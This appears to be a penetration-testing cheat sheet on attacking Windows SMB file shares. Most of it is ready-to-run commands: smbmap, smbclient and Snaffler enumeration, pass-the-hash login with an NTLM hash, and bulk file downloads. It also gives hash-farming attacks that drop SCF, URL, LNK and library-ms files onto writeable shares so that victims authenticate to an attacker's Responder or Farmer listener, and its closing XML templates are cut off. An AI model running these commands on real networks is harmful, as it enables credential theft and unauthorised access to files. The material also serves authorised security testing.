Skip to content

Internal - Shares

READ Permission

Some shares can be accessible without authentication, explore them to find some juicy files

  • ShawnDEvans/smbmap - a handy SMB enumeration tool

    smbmap -H                # null session
    smbmap -H -r PATH        # recursive listing
    smbmap -H -u invaliduser # guest smb session
    smbmap -H -d "DOMAIN.LOCAL" -u "USERNAME" -p "Password123*"

  • byt3bl33d3r/pth-smbclient from path-toolkit

    pth-smbclient -U "AD/ADMINISTRATOR%aad3b435b51404eeaad3b435b51404ee:2[...]A" //
    pth-smbclient -U "AD/ADMINISTRATOR%aad3b435b51404eeaad3b435b51404ee:2[...]A" //$
    ls  # list files
    cd  # move inside a folder
    get # download files
    put # replace a file

  • SecureAuthCorp/smbclient from Impacket

    smbclient -I -L ACTIVE -N -U ""
            Sharename       Type      Comment
            ---------       ----      -------
            ADMIN$          Disk      Remote Admin
            C$              Disk      Default share
            IPC$            IPC       Remote IPC
            NETLOGON        Disk      Logon server share
            Replication     Disk      
            SYSVOL          Disk      Logon server share
            Users           Disk
    use Sharename # select a Sharename
    cd Folder     # move inside a folder
    ls            # list files

  • smbclient - from Samba, ftp-like client to access SMB/CIFS resources on servers

    smbclient -U username //
    smbclient //
    # Download a folder recursively
    smb: \> mask ""
    smb: \> recurse ON
    smb: \> prompt OFF
    smb: \> lcd '/path/to/go/'
    smb: \> mget *

  • SnaffCon/Snaffler - a tool for pentesters to help find delicious candy

    snaffler.exe -s - snaffler.log
    # Snaffle all the computers in the domain
    ./Snaffler.exe -d domain.local -c <DC> -s
    # Snaffle specific computers
    ./Snaffler.exe -n computer1,computer2 -s
    # Snaffle a specific directory
    ./Snaffler.exe -i C:\ -s

WRITE Permission

Write SCF and URL files on a writeable share to farm for user's hashes and eventually replay them.

Theses attacks can be automated with Farmer.exe and Crop.exe

# Farmer to receive auth
farmer.exe <port> [seconds] [output]
farmer.exe 8888 0 c:\windows\temp\test.tmp # undefinitely
farmer.exe 8888 60 # one minute

# Crop can be used to create various file types that will trigger SMB/WebDAV connections for poisoning file shares during hash collection attacks
crop.exe <output folder> <output filename> <WebDAV server> <LNK value> [options]
Crop.exe \\\\fileserver\\common mdsec.url \\\\workstation@8888\\mdsec.ico
Crop.exe \\\\fileserver\\common mdsec.library-ms \\\\workstation@8888\\mdsec

SCF Files

Drop the following @something.scf file inside a share and start listening with Responder : responder -wrf --lm -v -I eth0


Using netexec:

netexec smb -u username -p password -M scuffy -o NAME=WORK SERVER=IP_RESPONDER #scf
netexec smb -u username -p password -M slinky -o NAME=WORK SERVER=IP_RESPONDER #lnk
netexec smb -u username -p password -M slinky -o NAME=WORK SERVER=IP_RESPONDER CLEANUP

URL Files

This attack also works with .url files and responder -I eth0 -v.


Windows Library Files

Windows Library Files (.library-ms)

<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="<>">

Windows Search Connectors Files

Windows Search Connectors (.searchConnector-ms)

<?xml version="1.0" encoding="UTF-8"?>
<searchConnectorDescription xmlns="<>">
    <description>Microsoft Outlook</description>